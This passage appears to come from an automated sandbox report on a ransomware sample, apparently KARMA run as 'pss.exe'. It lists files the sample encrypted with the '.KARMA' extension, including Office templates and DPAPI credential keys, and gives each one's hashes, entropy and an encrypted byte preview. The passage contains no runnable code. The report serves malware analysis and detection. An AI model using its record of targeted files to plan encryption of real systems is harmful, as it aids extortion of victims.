Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):294594
Entropy (8bit):7.999487811845438
Encrypted:true
SSDEEP:6144:0yqVoy7rRbpEh8ROw1e9N+y0EJADmsqzt:0JnxpAfMot
MD5:68C73707485E803B2ACF276FD155E5AB
SHA1:581F5787BC2B00B42FE08EFBC2D7BBD7F2ABB71D
SHA-256:6FE27FC470D84A273EC26DA173E310DB00D93F538A948A56E4019D6F543DF19C
SHA-512:5AD5178A33C70296701E65A1121E5D9FC21E99B8BFC1FE540D389A1B732614E4C0CDB83A961CF428C1957231C0E19DDCB041160AA3FDE3F34B26661601599815
Malicious:true
Preview: V@.....7?7$Ej.~r0Y.H....NA.......q...R5..-...j..C.s.n..Y......KARMA....1..-Q...3.w...c!....+1?u..9...0XX.....k..5..A..+W.....).....}.:.n.E.$..f.."...m...*..d.'N.y.*......g>......Z.j...OR..w,..|..m.|...wH...y.<.....*!j.3v..4........s6?..x*q.....e.0...I.g...{....Wr.....1..g1..... 7....i....E...eQ.@.Z.-.a..7......Z......t.....:q...3..4Fq.6%UV.b....R[.nNR..x.md.j....`H.!.q.}.l...#4!..:...8f..3OC.....{.........e..d.`.&..#....U.Z. 8o..?...`....}Rb.#..&...O.(..."k..Aj.x..i.G.....$v#......#5C...._..........{.);....V.Px.........!.C#..K?...xPr.....3."..5..A$..E..m.F..e..Kw.R#G.../......X.zf.OY..7Z..[.r..7.T.;..a,..pF.zf.Wuh........2............[....~.".......D..\........$4.I.5.is_.....5}al[..I..B..9_.,.$K}}..B....,......b..._3..mT...Z...f.b.20...B'W.2.....H.z.Bv..e.?..?.Wb........T..e6..D*..hFo.h.`HE.....i^...z..8n1.8q.T..;.#>^..g.b..^....Ppq..v...t}B...V..'....DNr.....x...p..%.d.0.`[\..*....sr......)a.(...........[F.*Gg.d.....Ga..........e.V...
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\ISO690.XSL.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):270711
Entropy (8bit):7.999111205500655
Encrypted:true
SSDEEP:6144:FakIS3RxlWxmvwoWZFUU6GOb0zn/ZmKv8R+TNNmgVdEL:FDIS3RxlkmvwPUfGOinBmKUiNN9VA
MD5:072C0F26EC1928B84B985A9D902FBAEF
SHA1:11227E021031C735C330135CDDE3DFB351599B7C
SHA-256:AD50AF309BBFC221FBB95F73CA7EE1385AB17FF0EC48C25C289C1C33C1DF95B1
SHA-512:07DE2354340410427055FE5B7CDA973B0C4658F1FBFE777A928D3E7D70BF431C43D3FA2A05E6F7155EF52463FC25C3A801A837D1B459F1D52947FCACC80E5F62
Malicious:true
Preview: ........^$.cNRqwOV.H...'.........>.{...>..e.%.E...@]...5.rf....KARMA6@9cao.5$.........x~_.......tK.._.O.f.c*m....i.....~.MVQ."...L.O6....a....b..^a...g.:...M-.^+z...ubH^.....OL..Ir.3...'V.pa\..gh..?.l.k..0gH\.44...+[U..Q....Bsk......'.(............4.....(...Rs...).....y.........'..V.>..+L.*.X....}..^c.......4.j...ovp2..//......T#^.~aH].xZ.g.&...9.y......K_*w{o...F`o....@.`e.>q _....tHQT........W..t.;.C......{.r.....D..p..rj.pk.s.Qv.eO.1.1 ..oA/....jn...E.&f.h.n.-..L.............t\|a./.q.E.~......_.Cd..GY....."...f..W.......1.`....p+C...6..J.s.v...t.V<gb..`..QW.....x..K......0.M.Ln\SW&Hm..v'.-..I~D....ZR.k...... .....>...A6.....7\.T...#..w..A.<5^:..zk...S.....7.(../`._=1.-02.wZ>..$.'.Ud.D.......{..0.\A..VIi.s.6...!.....s..O./Q...);.k..{_.+....<;2.e....aq....?..^.....L......"..i.Yq...VJK.^..9....l.U.....2G...2...E ..W.la..x.<..]........&m.......'..R5..H..=>..n.....}......q.#....9....{R...X.....d.....Y2\0t.....S:GJ.Z?>.....,X
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\ISO690Nmerical.XSL.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):217647
Entropy (8bit):7.999060804982078
Encrypted:true
SSDEEP:6144:EhoqsheNF97OvaofjEeLhnxOhrL7ErdvNzSovyPehvhkhnhObbR:EhoZeenLqh7EruoKPehwnhObbR
MD5:E540715341631B8E1D0F33FDFCEDAD1C
SHA1:1C897C6653B9C79C84DD10C3DEDFED3956807E91
SHA-256:5459707C0CF38C54989578A85E7019F8D9559C75DC93425528387A2EF42135DA
SHA-512:6ED12A47A58C47A1B7BAB6EDC04A73487836C49C13C2AF2782F37DD273A5362027EDDBF13D084BAABAD62B495BCEECB9E61AC449186D94D14678E1E2F82D7FE7
Malicious:true
Preview: .^C.3.h.z:.Nr$.uf.d;.........z.,.J....I;.R.n...bE...|..m...KARMA.....Uq..K;.G.m(L.GL6M..]&k...2h..._o8i..{....#.\.?/.q.=...i..9y..K...x..(.s%k..rIRmy..(..+.p.}}g|"..BG?...S....v.....&...JkI0v...=.o(#O.i.h...a....B..@@.U...)..._u.Sp..?p.p!..Q..m.....qQ..o<...S.7.....!qv.7.`.`.1.14....q.O......bZ~`UA.m}....../.r..r.5..n...Tb...wQz.P.#?.0.....p...V...b93Q..ce.Q...X.t7...:...6}"...*. ...wX.,.....]...Z.....{.&....rD ...5..z.K 8|...}K.O..I..D..I:NH.JFg.xC.H.a...V}....@....-.......S.*...JZ...[.........W.C".=5..0...~.6..>...`.m...)...t8....i..+w..iW.p..K.1..Dx.|.1;.NN/..R.......].Q...........-........k.....X...[.~6O.<...e...;#.....0...e..HW...q..n..N..9MI...../..=..R..^.T.....XwB9!QR.s.&...x....n.i......b.9..'n..5g.]./.........S..XF?S$O.a..sV.P.G".......=..JX._c....).'W$S.r...^..;.^.....l....^.5n....7.K.l...c.5...........<.2..ZEWS]..b.*.z.0.q...klSx.rCj.....A.......?........2.D........GB...._.....=...<vg.."zx...'...d81R...UF.J?s}#,.....s..
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):255288
Entropy (8bit):7.999364255656324
Encrypted:true
SSDEEP:6144:ujSpLTcBvjRtpniDlG/+3TzXoPxE/ai+Eum48eDMT:u+RcdDpnixG23aQVFum48OMT
MD5:6F24CAFE0253E43ACC6468777E71AC2D
SHA1:3CBAF92D63F601B01276EB34C202CB7E2F35DBD9
SHA-256:F11D6B244525A59517BEB256699139C722F654964E3D19C175BD3201EB9623C8
SHA-512:1BD610D6116B06A8CB1297F8D2664720E5721F3FEEA23BF2FE31166803D0DC654F41E78E7BB34ED34987381E227DE98E563182DE64CE71D09F7285A122E329F1
Malicious:true
Preview: k.q)'..0....H..v.LP.y..%.q..../(p...?.....$Z..q..x....P..M...KARMA-F..x..........+....lX..+.*v.t..Mp.V....6....1.!...>.....5\+.Q%y.l.c....h.eKk.........".....'..}...\.0g.......MNA.14&..'3.*..u*.S..y..T.E.....o.X..a...:+)....-.m....}."....e.Z.eA........@. ..-........[.....gn.....e...:........... d..."....M..!..^.Fn0c..Ge.*N..x.1..)....>.;..vW.PF$.%...ceu.....$U.v.q....T.?..I.T{..O=y.g?.EZ.e.}...~.Y4.-..;.45".+...%.8...k1i..p.......cI)F.}..i&Q...;P.....-..9.....=...../....|.U.kP..@.../..C.KwaB.[-....1.J.%..'V.Q>k:.b...7SO.O.......=.{..2.N.Kz.....J.....*.p....,7.#Qk.<b... Y.....)m..j.]@O.....e.G.Z.C@.|.X.1.,b......G....w..{..{.z....m.C.....A..xYS.DK.f.W..B...=F.....Ig.].4.......C..N. .e....c.W..S`..]...;......?.'f^..N...j..B....\.>..9....U9.l..ML.N.<(:...h.ps..K.3f..[.`*p.2..U...a...q...}3........Y.f.$....qt...}......9.......r.gs!.V......`p.B.......D....XV....r....3N.^.s......n..E3.(...........s[.\~t..(....cX..A......A...D.9,5.O..l...k..3..
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\SIST02.XSL.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):251405
Entropy (8bit):7.999389953090911
Encrypted:true
SSDEEP:6144:3ZNOAg/W/CAzVVgXd4RSiGoctWq4Ebt+GueR:pNOu/BVyKadcq4jGueR
MD5:77A395D277A8C281B7F26871CF8FF924
SHA1:86CF072DC3A3BFFB0266012994E0F1B9C31B0D21
SHA-256:16D81764438D5DBD12D4F1CBC806250B57E184106B89F7817A5CACCEE1814E17
SHA-512:EE41EFC6B38C59404B1611D0DCEE9945ADD7DEAF575B891C9C89D7679B72F9127EC985ED8D0971F6547B05CA1168CC9279421C7153997BE1378DE770368F61B2
Malicious:true
Preview: o.......W.D@j......l.\..Qn....s.F.0.8.*'O*..d|N......... W...KARMA!U.....Kh.+.x"...B...P...h.q..8...'..Qz....`J...M$R..u..%I......(.....-.w.`.....J.mam....P=.&.}.z.U..(...{.......8...;.y.../.. ?v..K._.......K..j....~_L...o.....r.;.b.....".e .0..R'..T-.....|i................0.e.2{+z..1.k'...O...8....P.XQ........S..A.2z.Z.^@..v...}*.i<..#.Kl............"X..N.....T....T..o.2..V..O.].......N....'7y..Ehkx..|.M..f..hCM..1"...].....O....Z..<...L.g...."p.....HJ..,.1#?....p_-C.J..:.7....e..<CP..&......0.B0..z.....I..+.8.....F...n...!...(.Q..;...L].d.=.#..G.4(.-...........I..H\e8. ....\.9K#uC.TB.S<.Q.K$.)?..@.~I....U=.\......-R.7.Lt......_....?C.[W..fa9yt2.L../K.m..lu.s.q.VF..m.@.8.....+...1>.q.C.N...D......f.U........G..k....F./.XrH....d^...+p.....+.b.qK...$..;..v. ...\..H.d...DH,...u..!.w....]..|U..D..E....m.4..tX..-X.$#..K...(.@.F*..&..H=.<.W..f.@.P%uHw.!..\....G.D...D.U\=-..YD4?:.zU..z.._Z...2b.6S..b9.......q.ll...4w.eh..2dr....... _)W..J|.L...{.
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\TURABIAN.XSL.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):344731
Entropy (8bit):7.999504743812455
Encrypted:true
SSDEEP:6144:4XggeaS8zt2bzAjXsbs1oVKSyBLhTBBllJ/aBb/0p0+96DNXmIzRcf+UNBT:kgglzt2X6XwKp7laBb/l+4NlRUX
MD5:073928B9EE8C475907DD05DE23E3DD95
SHA1:340A730BA037B34AFD46E1EC6A008A861CED5B09
SHA-256:2B8D7FA489C81E5D1B8C81CC48274A2A1722216EB933406EEB3A27764A9A4473
SHA-512:1C3FF810C553372CEA4BC451F808EAC65AD554B9257E05E746D953318C135702845D0B12836A48C8617ADC63ED134A0D77DE2A538E61BFACFF571E3B6C946969
Malicious:true
Preview: .G}5G?........k.J.bJ...9.b....Z]..3......`Jig.)&-...k.-.U....KARMAg.......UZ../P.B..)...".k.e.o4{...GO..-Z...".%C......<..TV........].......Z.w..o[r..M4oL[....#.v...h`AR.#n.~.:....N.J....N.a.D.t.G.K...cwIp...t[...%.t.NA.......O.....+.F.v...q[b...5....Lo..+..eV.L.f..(X0...B.[...@..{.EP...[....:6M.[....0QrJ..`.4dG..h..=...F4...c..d....0.~M..M.A.)FV.O.......H&/t.........o....j.K.).^.n2>.S[.<.v...7....S...o..{..p.}.-9..U.d.4........@J.cv...."pY.QF........Ig.zw..>...EeC.w..M. .7.z.1.XD..........._...n..-...u1N....\. .mm1#.B..-../_.`fe..KK....$.w_..\.!.N>d.I.....W{.?".i..%...........o..1....D..g...Q.-.....i.|u..W1..`....|Y..5...!Od.d.[....".I...........t.0..U.d.r......f.DTtc5..=..dO4......\....w.K1$SU!.Mh...Q.( ..f.......F.,0E....&.q......bf..f.D+.Uy.....m...k.....Am,U.H.t..[.rkH.....A..l..Y.bQ..;..Y.u...A.W.*...Z..O0+.....s.g...e.f..NFA..`^..Xk....75.zD.j....."8.E....X...D|..I....Cq...?....M......'...[.n...=L......dH.....&...7..7..$.....
C:\Documents and Settings\user\Application Data\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1920069
Entropy (8bit):7.999912641515446
Encrypted:true
SSDEEP:49152:a8aM9kUFuvwabpj/T7YEpY97v4r1KYvUG/Cnb8UxaGkADDplvh:TaMWU4xiGY97K1KYdCj1k8Dvh
MD5:89C9E5FEC59D85C85888509692A0E8D1
SHA1:ED4F82C892E2A0DA76E3217D9CCBB538097B2801
SHA-256:F16457DC290B18CD8D50BA5770C3EF06DF4FD4BADD123434D0E73A10E091A4E9
SHA-512:D34454DB464E9CCE9247F2177BDA1677AEF3DF4021CF9AD0C89D66EC20C30F7B14B13D3CF8D3FACD6F99637B0472A58F866222178A4023F91B175436F5B3E351
Malicious:true
Preview: . A z...$T"...m.l..Um+.|.........#3.4Y...^D.....l..6..c.k...b...KARMA.b.x.O4..0...a.L}.jc...l..xQ~......*g3-<;g\.:.)*.j........O.f../k.y.=.*d...Kh.R..A..d&..r.g>Q.....]E.v.@7..;..Z....~....D:.A(.{....C...$.~..|.V..X..O..((.........\..>q..}.c..9..C..1..3i..d...4s.4.=...N.Z.*..h.f.^O......L.+..D.V.4.?....2.G.T..X...l...{.T./........Gd.7......mFL.._.!F2....$R.....q............2H..'.....E....jR*D0K.......Ft.Or.e.{.=K{......!X N..1.^....B.....b...........;.r...P...r.........3.1....M...e...../.=...~}..O6^t....&.'......)...5..%(.rvb.\.....O.R"S..H..uO..&P.%5].5._..0.'..H.:..&.......%...#d3.b..E...:7.$....[.......W.....K..`.{...=.d.K...(Q$../.Q...n.....P.?..n.-)..h..)....P..Q.9.l<2...i.'...R.....;..!.}<!.oN.2..`[..._.K6....x^^?.w..)....dId....z..=...hH.~...D...,...Hb=....-...]i.l...$']Pi...*..B.7..bS..w.B-y...i..T^;..6..\.eE*....8....~!.%..Q....3e..>.l../.....B.<.L.TW./:..hm....e....W.;.(C...o[-.v.....I..I....g...Q.....W..E.G.}.......i.....r.
C:\Documents and Settings\user\Application Data\Microsoft\MMC\services.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):92941
Entropy (8bit):7.997884392291508
Encrypted:true
SSDEEP:1536:Z3vYRNyYQSYwWEM3eLlLfHkZhP97e1YAZsaCgzRy4ThhXDDMBUtFKTJsSnvW5U+Q:NvMyYhZUuRfH47SjySjMS/eWmvWgsU
MD5:796271D8990E9EFE2EE327F5D04EBC2E
SHA1:B683D6689435C8E77C38DA62646AB1FEE2DE694A
SHA-256:DF90E4DAEBC045DEDB4F7B6E5A1F4F609E4BF79D80E17CC922A169BEF43DB66C
SHA-512:35B82066EA52B9A56EDEDBBD617308A51FF0B398DD380B171E123859B8C7B23882F8835187D49242EC1DB6C69699080DAA7BDEBD54A9517EF8D23663B7332B13
Malicious:true
Preview: .+..2)U;.ne....^t..$.U.A..........~...........0.F.".f...d....KARMA/......`..{..z.a.f.v.=...Y.|f...I...</m.......F|.B..(..|.T...,......y;..)..Fi.~......>:.9".....x..Q....:.......x.C......B.d...r.[9........1....[5xYW..j........<...9.MB.).:.......)%w...'}....J../.m.D.......WV.:..)&uB....8FC*:..b.f.Y.....G:r.\..fNC.......g...C.s.AH......0......&z.D......aC.}i.....0y?v..T...A@....c.....5..HX15.[..P.........a`..r.&..=E..&D;-.D*.xJ..cf.#....+...".iXg.e.......uRQ..?..)4E.@.FM.+"I....O.Xj5.rq....>.l.......W.R+...O........}..)......^[.a.N,.H1...#....m..H.5GG..&......=c.;. r~....(i...B5.....Y......M..f. r*...H...o|.].&..Ef.g.....u{}.*.PEt...{b.................n.`.U.W(.(.7..o...g{h....f.......H&..#..;.L........a.6&. n..vQ.T.|..[NAYI.s-....6%....5.i.........%.F..E....!..J..\....(.9+..bz..M..b.C`...Ri.t....N..q. o."y.sX.KC6&...E}..b....*>Dp...wi;'fG7WA.~,.hc.V.w.D../k..T....o../&.4...n......o..A.p......JkW......W....1R(EYyn&...D..%.aB.Y$.D
C:\Documents and Settings\user\Application Data\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.611935145089897
Encrypted:false
SSDEEP:3:h80auaTk6BPL74N7QTfTVR:fgk65LUUT77
MD5:A109BDE54DD86233806EA2C033109FA5
SHA1:FCD03F321C7BC63DE652EA4C680C40E4F7F5FE73
SHA-256:7BF26158BDDEE1438002E3F2C734FD468BF93CED21A30ED54AE62A583D8A86D1
SHA-512:B22060676D08A83257926268B770275F066D8DD9147B4C2D069B65241F0A19A062BBC48FDBBD7391C63BD180A7709AF8E4F532461887F2B8B199965EA05D14CC
Malicious:false
Preview: P.{.k:..Q...J'...n...J.*.[....i4(.F..B.e..9......M...M..Z...KARMA
C:\Documents and Settings\user\Application Data\Microsoft\Office\MSO1033.acl.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):37799
Entropy (8bit):7.99476165829671
Encrypted:true
SSDEEP:768:++Y/ErqYfl1uHBdfmlNioI1gJc7XIiEblDpZkeqyibJs4u:7YcqYLWbfmlNioI1gJaVqDpZkeqPs4u
MD5:C57D0D59C16142EEAAF24E2E5EF27E2B
SHA1:83060813D8905F8645F346E491826AB2345EFF77
SHA-256:A350AA9AAEA6B1C4EF5CFA904DCDB67673C14833665AAA317AC0769DFDFCFE00
SHA-512:A0C8D1D78DC06AF8B16AA7A552A0FAD210EF9C01550D01A29AF2CAC62DF6154E528532ED8879476915BFB7477A6CF9C01090355395CD70B3F26C50CFBF342A77
Malicious:true
Preview: .Z...}iIp4^..9jO.l<.<x0.2..b....SK.>.P,.e..T.[:.9}.).&!.mq...KARMA"(a..8b...F.PtEk"x.Z.u.......-..PW.....Y:..G@.^+ZK.%.WU...... ...2U^.@#.y[~.j..H .iNn.v\..W....f.....5l...E.hb.b..n.....L.N.m.}...JN.z.....a....4tR.g|........^..l.b......R..1Wh...:9.~.Fj.b.."....|N..F....HH....Q..2.*.......;6.@...X..z..~......37C.t5L.3.7EkH=...&......jC.F..aj.h3&@.E.l....}l..{.....?......f..<..P6.R.N.+-.JK+W7..:.F.m..&..b..G.I.&...lB...w..E..eF....x.11.I.].....i..w_.......\....>..w7..X/.....7...o.o.g....~.p..~.....Z.X...b.k..0......um......C.......0.-o.)gWa..CzMu.?.....R..(-z...$.vTNu>T...}`..mB....e..lC..`.tF.......r......9..<..0\...w;.q|..:.j.....io.........E..W..8.N.....P.Y.....4.W....*v..;..qaT.NG..A..lZVU.......W..*o.....|.k.....S.,...c..a.X.U.-V..\....!...~M...P....F..?......QoI...Yj..tqz.*..`..g..wg3`....W..w..8Lo..I./..Y..N6e.xY{..sS.9...ez.,iei...-.....-Ur..@.cU2.>o...........`.i...gg....l|.8.n..<..}Zs.'.......H.o...2!..[.`)g.W'..8...Eg1...a..]..:.~o.*.l..
C:\Documents and Settings\user\Application Data\Microsoft\Office\Recent\index.dat.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):97
Entropy (8bit):6.2132141308023225
Encrypted:false
SSDEEP:3:+//fxhNbfgQ3By4iCqyF5uRg1jUKbTGOTfdWTn:+///SQV5t6ETfdm
MD5:007BC1831FF05EEE0EA81BA30DF030F0
SHA1:040A99AE793871EF8216DFCCA5CA5ED4AFE4A061
SHA-256:926485480827286A97FD280706F1E40E241C09BA4963F39EB2189CD79807741F
SHA-512:BAE1CB9B18C31873CE3C8F88A8744A3D6477B468BFA394995A021E9A3FAB6AE97F6FB1D056A674FB7A83A5554ED151F380A40BF2D23EF7ECD10AB8742F85A1F7
Malicious:false
Preview: ^..29.*...:nv...~6..P...u.ts.......U.g.3:.~c..x...y..I.D.>L...KARMA?..6zP...\,.mG8"....h....7
C:\Documents and Settings\user\Application Data\Microsoft\Protect\CREDHIST.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):381
Entropy (8bit):7.451231587691226
Encrypted:false
SSDEEP:6:Akcpsld8Bd4LUrF6OuJFdRhj8lq1OJPD+y03Lp6hPypwrV/lOfFwny8vPFmviu/G:AkKsld8ELUJ0JFd7AoOJKyE4hP7rPQFc
MD5:D702FA9B4E3C28A5D47B763C15DA78DF
SHA1:A48A0A8F0A24A75DB47080274E88152F1FB9489F
SHA-256:4D1E79597DAB4CE91F136F868D332675CD5062C3B66D41C94DAAFB53B8A97451
SHA-512:0AE0881E5A647709BAB0C4D81DFC15FE4C75535A523C80460B94823325FCAB68DED7CBA31135580EEF48581FC124AD56C79C3DCD4FCCF084EBAC224013771037
Malicious:false
Preview: {..-AGz..;.Wu..w8.........!......YG9....J3.').!B..nyX.MB.]...KARMAP..M..!I...b.:=g......$.a]....}..".z8.3......_pa..{.....W... .?=....x..\..=..#D:q..!.Nz@......@......,.]...m'.u.......y.Lw.7A~.?..V..........U8...L.5.6n..].?{..l.6q.}*o.s..q..&...|...O.....J{.......=.v._..ZF....@..T$._!. .nX.W.n.#.7"....1Q.X.<$....|E..K+......B[.#....-.Ce....=..[.u.$:"h.....@..`!6r.
C:\Documents and Settings\user\Application Data\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\8a95f74b-deb7-4d33-9ab4-dd6c9dcc72dc.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):537
Entropy (8bit):7.600491554827822
Encrypted:false
SSDEEP:12:0gjBzrRLiozkfUxpL2uydgi5kvNC2Bv373UQSbp:HjBzrXz0UT0Z5yNBvs
MD5:43A0F50AF6D618CC163AE8D344553D8E
SHA1:7A97ED6BADD66437DD2F87AEAD61D0E02D2FEE14
SHA-256:24E5B73E6A8BFC9D9419D9B0C7912BD813C22E6A66CB61B2869BD063C58DF044
SHA-512:45FE7335218E6F7CC855D750CCD4E76E54DCFC439380F9C69602E12AB386B7166B7165C8AF82B13074267BF41B282E1D4137AE8C909C45B33639350805B1F5EF
Malicious:false
Preview: ..%k.|..7.e.&.S.h+g.I...rC.....ZN.9...0.VC.....T..qEF?.5.....KARMA-...=............RR.x).FZ.W.....F}.....u.:...oqU.+.....CM...G..9c...h...q...(.u..>.B.*2u...+........`..]....Ue..1.6..NV.......6K....sr......G.W..p..q..h.k..7x.`....;2#.G.oK..mW|M#..p..R...*.>.GF....R.Ls...c..|...ta0c2..I......G..3(p...x=j....'P.&..6...(.....l..._.....k..l.....nW........F....nR....#>....&5.....1.L_..SS...1.I.Mt.0...MZ...{^..b.......t.OZ.9&....a.dDO...8.!....."T"7^uth...z.&.?....\e.......`..&.........I..7...H+..Y`.'..2.]...
C:\Documents and Settings\user\Application Data\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\Preferred.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):93
Entropy (8bit):6.062120875875773
Encrypted:false
SSDEEP:3:jvpsMeWaDlS666tsOH0SetH4eXy01n:Tpsfn5S6IcOH4s91n
MD5:86C072C5C1E6493EECEB8793F89EE7AC
SHA1:E8A9464972DAACD49D8F471467DDD3744D090BA4
SHA-256:A7DB8AA88707BD64BB6812DA05412E436E2E38220BE44B46BCF00021124E67CE
SHA-512:720E76CE75DC66EB7214BA99705A158756E33059F48C46FDA506F2C5302BF0AB957B9C6E6F598209BA0FDE595EBC763370B2F45E2DB0A78109329E3F56CF9810
Malicious:false
Preview: ...A.I.{.#.`N.....+..Z...X.?...7,..,TYj.....[..I.[..B'....L...KARMAH.1}......y....B.r..`K.
C:\Documents and Settings\user\Application Data\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\b5958470-8ce5-4bb4-8d3a-2c85a109dae0.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):537
Entropy (8bit):7.61202645802131
Encrypted:false
SSDEEP:12:EbyIt641a8adneLF1W7ElOmyeEDeGjDSKWKw4h7HHdzKlOUq:iyIL1axARSElOpeGfCKw4h75R
MD5:E5950051B096030609808B7BA7448C4E
SHA1:B960AA9237FF3D35CBF0DE370AAF8BC9D14F1482
SHA-256:43A8BCDFF428FCDD892224F21808E6D6309447E86894ED733FCD7C5BC4F131B6
SHA-512:CADEC9C4EBA847DA0670F82B3337447F20CEC724ECDC96B34EE179C7C4C535B7001BA20264A80BDA037F6A0421A684754096573D71B77E8D87B80A0092A43804
Malicious:false
Preview: ...<N00s....;........!..K<.......B..?.?...Ar NW....@[..+...KARMAc'p.@.y....:..Z*...C.e5.a@. 5Z.DD*l...\.?f.....Y..0....?2....T..r..'..!,......{.`..t..o.|....c...n.#!."Q..r.0..L/bg&4...P.Z.:T....r..X^.).....f.,c.3...%..t....Q..?....YbM.w.}c.u.].......sd.]_..{+._..=..........4.....c..W.+..O.:.9.{6&.)f.......=V.g.A.6..._...#.....?i.....Uu...,.....=F.p....;.......`W......+.s.....=.....Ip.....".......1...e.y.:.7.5.3....{...k&.i.....es.B.....j....jPCE.O...3.22..2&..f.......).g.......|.%...1P..)....@.h..,.
C:\Documents and Settings\user\Application Data\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\f46745b7-7051-49e0-b579-fcf31786d9fb.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:PGP\011Secret Key -
Category:dropped
Size (bytes):537
Entropy (8bit):7.535032634267722
Encrypted:false
SSDEEP:12:VKFJfB3y4MdiiUQK/Ms/9VHIzlUbqDsdMVLTu8UmX1gm2B:myRIn0iq/DxLSxmlgmi
MD5:C508A3CFA7DA0D50B66C772A1060C498
SHA1:D2D05B745AEF86F03EBD2E5FEF473DA296ACF71D
SHA-256:5F760A87B226DC4E7321B5AC13690BB4C4299AC22B111F11D7443ACAA9DB7F13
SHA-512:51A45A3FF2043F49AF2404717B61FA89284C86B398AC704A7269D4936D1D3E48C432CBE0544D1DCBFF12E8AF29723BE6D12AAB6B4522AD84870313BDBA8701D0
Malicious:false
Preview: .OH.....e...T.O.....Be....x....sa...B_*..I...x.V.....2..Z....KARMA....6.,D~t..@.H.8..|L.*.........-.;..x.....<6/..Q7.3g....J^.8;.2....h..=.,Q....1.3b...,.. ..@..}.*A.zQ)k..T.......q..L.'....g.ZBg_..x[C..X@..hG...3....=...h...Z.RK3td#B]S..lB.S.d....1r.....=....l..~.C...v..........?.t.V.,W.H?.....V&......(|vm.U..["..a.Y..-...V.UU.L........yCXs.ax..../M.veJkZl....(..C..Z&..%.-......g]Q........E...S7)M.].)..Hp.........L......M...;..........d..e...B...6.\......c.Ut7Z.^.....q.Z......\....L..'H..0.y
C:\Documents and Settings\user\Application Data\Microsoft\Protect\SYNCHIST.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):145
Entropy (8bit):6.699842603984348
Encrypted:false
SSDEEP:3:5YaJ4In/qUncOLys6s0oBPzvXyHxjMDn+AUWCDUYp814N2:5YaJ4In/pc46s00PSjCNiiA2
MD5:F77CAB5D019D1BDE5319A4B343B6107B
SHA1:94F87E67B099B784040508AF35EA7538F27739ED
SHA-256:8BB899D684657193035823F8C7BC7BD03ACF8F1631DC3C0B883FCE7EE0365AA8
SHA-512:C185A5F45ED3AE1051E4402B74C3C7E52E0AFA70C00322A3C6A79FCA0669DFAF9AA1BE895755BE903F48C7BB85F82C9B0BF29C30C5E92EA6FD0FDBA5500BACFB
Malicious:false
Preview: oX.}.=.D..B.0..P.....7.)....;.........<Cx..,.J.o..3.W.&}3.xO6...KARMA.H.j....../w..<...]i.u...tfM....N8.g.....F.Pz#e..qfl..R=...II.....X..>w
C:\Documents and Settings\user\Application Data\Microsoft\Spelling\en-US\default.acl.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):71
Entropy (8bit):5.705947471556413
Encrypted:false
SSDEEP:3:JxGftbYO3gzqBF27rpKX0fn:7GhBU7r/fn
MD5:32A927A5174DF3232BE15437D0237A21
SHA1:1A80B1D25C7B12C80B658203E86ECD437903B484
SHA-256:C0EB1AFFFB05ECF99AE6A52B3F0F4ABC8DEE230DA6B6AE60C39FF83142C33EA5
SHA-512:847A99E545AA1FD908CE5A888756CAA95AA3A6BE646AE7224DE3E131D42BD35736398E20E9AEDF85A487B58637BA716FAE92245C429E52D87470DD0B65A1F2A6
Malicious:false
Preview: ...L.J..@...2'.@}...s..>.......H.Om...D......z..M4..(^o......KARMA3:
C:\Documents and Settings\user\Application Data\Microsoft\Spelling\en-US\default.dic.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):71
Entropy (8bit):5.716579689896742
Encrypted:false
SSDEEP:3:xmDw0xStpoJRk7SCn:I/CpUrC
MD5:72B214850DC595DDEB9DD240A10A4958
SHA1:942A01512C786C3A339F4A1E36DC5EAAA2690D0B
SHA-256:686FE8DE71BAC250809851F8E2B87145DFB880FEB7C2E79A16C8F2C37086064E
SHA-512:A93281C41C3758F5A5CCE72C39CBF73A8B7C60BBCB2FDD26195506D2E17DB01633317EEFFB64838BC38FF777FAE6477DB47C868BB4AD439872CF63AEF5EF93D0
Malicious:false
Preview: ..z......YY..%...~w...E|p................N......l....^...KARMA.
C:\Documents and Settings\user\Application Data\Microsoft\Spelling\en-US\default.exc.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):71
Entropy (8bit):5.721488359553034
